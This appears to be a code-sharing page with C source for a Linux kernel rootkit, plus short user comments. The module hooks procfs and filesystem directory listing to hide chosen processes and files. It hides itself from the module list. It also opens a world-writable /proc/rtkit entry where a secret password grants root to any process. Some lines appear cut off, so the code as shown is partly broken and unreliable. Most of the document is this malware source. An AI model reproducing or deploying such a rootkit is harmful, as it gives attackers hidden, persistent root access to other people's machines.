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Created October 27, 2012 13:18
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#include <linux/init.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/string.h>
#include <linux/cred.h>
#include <linux/fs.h>
//typesafe macro for getting minimum value
#define MIN(a,b) \
({ typeof (a) _a = (a); \
typeof (b) _b = (b); \
_a < _b ? _a : _b; })
//how much pids we want to hide
#define MAX_PIDS 50
MODULE_AUTHOR("Arkadiusz Hiler<>");
MODULE_AUTHOR("Michal Winiarski<>");
//we don't want to have it visible in kallsyms and have access to it all the time
//so it's static
static struct proc_dir_entry *proc_root;
static struct proc_dir_entry *proc_rtkit;
//here we store original version of readdirs functions
static int (*proc_readdir_orig)(struct file *, void *, filldir_t);
static int (*fs_readdir_orig)(struct file *, void *, filldir_t);
//here we store original versions of filldir functions
static filldir_t proc_filldir_orig;
static filldir_t fs_filldir_orig;
static struct file_operations *proc_fops;
static struct file_operations *fs_fops;
//to store kobject list places, used for revealing presence
static struct list_head *module_previous;
static struct list_head *module_kobj_previous;
//array used for hiding pids and it's position
static char pids_to_hide[MAX_PIDS][8];
static int current_pid = 0;
//some switches
static char hide_files = 1;
static char module_hidden = 0;
//place for printable status
static char module_status[1024];
void module_hide(void) {
if (module_hidden) return;
//remove from modules list
module_previous = THIS_MODULE->list.prev;
//remove kobjects and store just in case
module_kobj_previous = THIS_MODULE->mkobj.kobj.entry.prev;
module_hidden = !module_hidden;
void module_show(void) {
int result;
if (!module_hidden) return;
//readding module
list_add(&THIS_MODULE->list, module_previous);
//restoring kobject to it's original place
result = kobject_add(&THIS_MODULE->mkobj.kobj, THIS_MODULE->mkobj.kobj.parent, "rt");
module_hidden = !module_hidden;
static void set_addr_rw(void *addr) {
unsigned int level;
//get page in which given addres resides
pte_t *pte = lookup_address((unsigned long) addr, &level);
//set page RW
if (pte->pte &~ _PAGE_RW) pte->pte |= _PAGE_RW;
static void set_addr_ro(void *addr) {
//as above but unset
unsigned int level;
pte_t *pte = lookup_address((unsigned long) addr, &level);
pte->pte = pte->pte &~_PAGE_RW;
//new methods which wraps originals
static int proc_filldir_new(void *buf, const char *name, int namelen, loff_t offset,
u64 ino, unsigned d_type) {
int i;
for (i=0; i < current_pid; i++) {
//if matches any hidden pid don't show
if (!strcmp(name, pids_to_hide[i])) return 0;
//hide also our own entry
if (!strcmp(name, "rtkit")) return 0;
//invoke original
return proc_filldir_orig(buf, name, namelen, offset, ino, d_type);
static int proc_readdir_new(struct file *filp, void *dirent, filldir_t filldir) {
proc_filldir_orig = filldir; //stor original filldir
return proc_readdir_orig(filp, dirent, proc_filldir_new); //pass our wrapper
static int fs_filldir_new(void *buf, const char *name, int namelen, loff_t offset, u64 ino,
unsigned d_type) {
//hide if matches
if (hide_files && (!strncmp(name, "__rt", 4) || !strncmp(name, "10-__rt", 7))) return 0;
return fs_filldir_orig(buf, name, namelen, offset, ino, d_type); //invoking original version
static int fs_readdir_new(struct file *filp, void *dirent, filldir_t filldir) {
//analogus to proc version
fs_filldir_orig = filldir;
return fs_readdir_orig(filp, dirent, fs_filldir_new);
//function used when reading /proc/rtkit
static int rtkit_read(char *buffer, char **buffer_location, off_t off, int count,
int *eof, void *data) {
int size;
//generate nice output
hides files prefixed with __rt or 10-__rt and gives root\n\
mypenislong - uid and gid 0 for writing process\n\
hpXXXX - hides proc with id XXXX\n\
up - unhides last process\n\
thf - toogles file hiding\n\
mh - module hide\n\
ms - module show\n\
fshide: %d\n\
pids_hidden: %d\n\
module_hidden: %d\n", hide_files, current_pid, module_hidden);
size = strlen(module_status);
//handling pagers, output is quite small, but who know
//just start at given offset
if (off >= size) return 0; //exceeds? nothing to return
if (count >= size-off) {
memcpy(buffer, module_status+off, size-off);
} else {
memcpy(buffer, module_status+off, count);
return size-off;
//this is invoked when someone writes to /proc/rtkit
static int rtkit_write(struct file *file, const char __user *buff, unsigned long count, void *data) {
//just compares input to secret words, uses strncmp in safe maner
//my pen is long is the secret passwort to get root
if (!strncmp(buff, "mypenislong", MIN(11, count))) { //changes to root
struct cred *credentials = prepare_creds();
credentials->uid = credentials->euid = 0;
credentials->gid = credentials->egid = 0;
} else if (!strncmp(buff, "hp", MIN(2, count))) {//upXXXXXX hides process with given id
if (current_pid < MAX_PIDS) strncpy(pids_to_hide[current_pid++], buff+2, MIN(7, count-2));
} else if (!strncmp(buff, "up", MIN(2, count))) {//unhides last hidden process
if (current_pid > 0) current_pid--;
} else if (!strncmp(buff, "thf", MIN(3, count))) {//toggles hide files in fs
hide_files = !hide_files;
} else if (!strncmp(buff, "mh", MIN(2, count))) {//module hide
} else if (!strncmp(buff, "ms", MIN(2, count))) {//module hide
return count;
//those null checks are for sanity
//if something failed than nothing is done
static void procfs_clean(void) {
if (proc_rtkit != NULL) {
remove_proc_entry("rtkit", NULL);
proc_rtkit = NULL;
if (proc_fops != NULL && proc_readdir_orig != NULL) {
//restore original reddir
proc_fops->readdir = proc_readdir_orig;
static void fs_clean(void) {
if (fs_fops != NULL && fs_readdir_orig != NULL) {
//restore original reddir
fs_fops->readdir = fs_readdir_orig;
static int __init procfs_init(void) {
//new entry in proc root with 666 rights
proc_rtkit = create_proc_entry("rtkit", 0666, NULL);
if (proc_rtkit == NULL) return 0;
proc_root = proc_rtkit->parent;
if (proc_root == NULL || strcmp(proc_root->name, "/proc") != 0) {
return 0;
proc_rtkit->read_proc = rtkit_read;
proc_rtkit->write_proc = rtkit_write;
//substitute proc readdir to our wersion (using page mode change)
proc_fops = ((struct file_operations *) proc_root->proc_fops);
proc_readdir_orig = proc_fops->readdir;
proc_fops->readdir = proc_readdir_new;
return 1;
static int __init fs_init(void) {
struct file *etc_filp;
//get file_operations of /etc
etc_filp = filp_open("/etc", O_RDONLY, 0);
if (etc_filp == NULL) return 0;
fs_fops = (struct file_operations *) etc_filp->f_op;
filp_close(etc_filp, NULL);
//substitute readdir of fs on which /etc is
fs_readdir_orig = fs_fops->readdir;
fs_fops->readdir = fs_readdir_new;
return 1;
static int __init rootkit_init(void) {
if (!procfs_init() || !fs_init()) {
return 1;
return 0;
static void __exit rootkit_exit(void) {
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isafe commented Jun 9, 2014

Hello,I have some question want to ask you ,can you help me?

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Stolas commented Jun 9, 2014

It is quite easy to detect this rootkit. However this is a nice job for less then 300 LOC.
Also the commands for letting the rootkit do things, come-on..

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Line 73 is apparently not enough to unhide the module from /sys/modules. The following error is coming up:
libkmod: ERROR ../libkmod/libkmod-module.c:1802 kmod_module_get_holders: could not open '/sys/module/rt/holders': No such file or directory
Do you know how this can be fixed?

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